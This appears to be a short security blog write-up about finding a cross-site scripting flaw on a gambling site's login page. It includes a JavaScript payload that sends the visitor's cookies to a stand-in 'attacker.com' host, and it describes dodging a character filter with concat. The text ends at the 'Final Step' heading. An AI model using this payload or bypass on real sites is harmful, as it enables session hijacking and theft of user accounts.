Today, the gambling industry is one of the hottest topics. so I decided to examine this site for vulnerabilities. About 80% of these sites use a single script. This means that if one of them has a problem, the others will have the same problem, putting several million people at risk!
Step One — Information Gathering
I had to look for vulnerable pages. I checked several sections of the site but did not conclude. Then accidentally noticed that the login page is displayed to me even if I’m logged in. It might be a programming mistake, but it could become dangerous if there is a vulnerability on the page. At that point, if the user has already logged into his account, we might be able to gain access to it.
Step Two — Vulnerability
Filtering the input parameters was the most challenging aspect of this vulnerability. I found the forbidden characters by using different phrases.
Step Three — Payload
To send cookies to our server, we must use the following payload. but the problem is that the characters are filtered, so it does not work!
var url = “http://attacker.com/evil.php?cookie=" + document.cookie; document.location = url;
We cannot add cookies to our URL because the plus sign (+) is filtered.
Bypass: Splitting the address into two parts (the site and cookies), and combining them using “concat” in a new variable.
Final Step — Attack